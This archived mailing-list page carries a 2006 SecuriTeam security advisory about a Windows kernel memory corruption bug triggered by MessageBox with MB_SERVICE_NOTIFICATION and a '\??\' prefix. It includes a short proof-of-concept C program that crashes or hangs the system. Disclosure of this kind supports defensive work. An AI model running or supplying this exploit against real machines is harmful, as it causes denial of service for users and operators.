Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Memory Corruption on MessageBox with MB_SERVICE_NOTIFICATION and Qu

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Memory Corruption on MessageBox with MB_SERVICE_NOTIFICATION and Question Marks
Date: 21 Dec 2006 21:49:30 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Memory Corruption on MessageBox with MB_SERVICE_NOTIFICATION and Question 
Marks
------------------------------------------------------------------------


SUMMARY

A problem in the way Windows XP/2003/Vista handles MB_SERVICE_NOTIFICATION 
messageboxes allows local attackers to cause the operating system to hang.

DETAILS

A message was published by NULL about vulnerability in Windows on 
processing MessageBox() with MB_SERVICE_NOTIFICATION flag and 
message/caption beginning with \??\. Vulnerability seems to be memory 
corruption in kernel and causes system crash or hang after few attempts. 
It seems to happen because message is logged to event log and may point to 
some problem with event logs processing.

The  problem is in win32k.sys' function GetHardErrorText, which tries to 
prepare  EXCEPTION  data  for  event  log, and seems to be some very old 
debugging feature accidently left in production code since Windows 2000.

In Windows 2000 there is a peace of code like:

} else if ((asLocal.Length > 4) && !_strnicmp(asLocal.Buffer, "\\??\\", 
4)) { strcpy( asLocal.Buffer, asLocal.Buffer+4 );

Exploit:
#include <windows.h>

int main(void){
int i;
char bug1 [] ="\\??\\XXXX";
for(i = 0; i < 10; i ++)
 {
  MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
 }
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:3APA3A@security.nnov.ru> 
3APA3A.
The original article can be found at:  
<http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=21&m=140672> 
http://bugtraq.ru/cgi-bin/forum.mcgi?type=sb&b=21&m=140672



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Memory Corruption on MessageBox with MB_SERVICE_NOTIFICATION and Question Marks, SecuriTeam <=
Previous by Date:  [NEWS] Oracle Portal 10g HTTP Response Splitting, SecuriTeam
Next by Date:  [NEWS] Novell Netmail IMAP append DoS, SecuriTeam
Previous by Thread:  [NEWS] Oracle Portal 10g HTTP Response Splitting, SecuriTeam
Next by Thread:  [NEWS] Novell Netmail IMAP append DoS, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]